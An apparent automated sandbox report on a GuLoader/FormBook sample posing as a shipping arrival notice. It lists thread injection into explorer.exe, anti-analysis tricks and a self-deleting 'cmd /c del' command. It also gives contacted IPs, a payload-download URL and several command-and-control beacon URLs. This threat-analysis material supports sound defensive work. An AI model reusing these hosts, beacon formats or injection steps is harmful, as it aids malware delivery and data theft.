Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3424 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' Jump to behavior
Source: explorer.exe, 0000000D.00000000.1212057520.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe PID: 6396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5228, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 482590 Sample: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Startdate: 13/09/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 11 other signatures 2->42 10 NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 1 2->10         started        process3 signatures4 54 Tries to detect Any.run 10->54 56 Hides threads from debuggers 10->56 13 NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 6 10->13         started        process5 dnsIp6 34 www.paulassinkarchitect.nl 91.184.0.38, 443, 49817 HOSTNETNL Netherlands 13->34 58 Modifies the context of a thread in another process (thread injection) 13->58 60 Tries to detect Any.run 13->60 62 Maps a DLL or memory area into another process 13->62 64 3 other signatures 13->64 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 www.microsoftjob.com 91.195.240.117, 49830, 80 SEDO-ASDE Germany 17->28 30 everythingswallow.com 160.153.136.3, 49824, 80 GODADDY-AMSDE United States 17->30 32 10 other IPs or domains 17->32 44 System process connects to network (likely due to code injection or exploit) 17->44 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.117
 www.microsoftjob.com Germany
47846 SEDO-ASDE true
209.99.40.222
 www.rlmwebcreations.com United States
40034 CONFLUENCE-NETWORK-INCVG true
142.111.236.6
 www.wxsjykj.com United States
18779 EGIHOSTINGUS true
54.65.172.3
 www.acooll.com United States
16509 AMAZON-02US true
160.153.136.3
 everythingswallow.com United States
21501 GODADDY-AMSDE true
34.102.136.180
 taylormakeyourlife.com United States
15169 GOOGLEUS false
91.184.0.38
 www.paulassinkarchitect.nl Netherlands
197902 HOSTNETNL true
44.227.76.166
 www.priorpublic.com United States
16509 AMAZON-02US true

Contacted Domains

Name IP Active
taylormakeyourlife.com 34.102.136.180 true
www.microsoftjob.com 91.195.240.117 true
www.paulassinkarchitect.nl 91.184.0.38 true
everythingswallow.com 160.153.136.3 true
www.wxsjykj.com 142.111.236.6 true
www.rlmwebcreations.com 209.99.40.222 true
www.acooll.com 54.65.172.3 true
www.priorpublic.com 44.227.76.166 true
beckyhartpcpublishers.com 34.102.136.180 true
www.taylormakeyourlife.com unknown unknown
www.everythingswallow.com unknown unknown
www.beckyhartpcpublishers.com unknown unknown
www.dominionhavanese.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.acooll.com/kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 true
  • Avira URL Cloud: safe
 unknown
http://www.beckyhartpcpublishers.com/kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 false
  • Avira URL Cloud: safe
 unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin true
  • Avira URL Cloud: safe
 unknown
http://www.everythingswallow.com/kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 true
  • Avira URL Cloud: safe
 unknown
www.acooll.com/kbl2/ true
  • Avira URL Cloud: safe
 low
http://www.wxsjykj.com/kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 true
  • Avira URL Cloud: safe
 unknown
http://www.microsoftjob.com/kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 true
  • Avira URL Cloud: safe
 unknown
http://www.taylormakeyourlife.com/kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 false
  • Avira URL Cloud: safe
 unknown
http://www.priorpublic.com/kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 true
  • Avira URL Cloud: safe
 unknown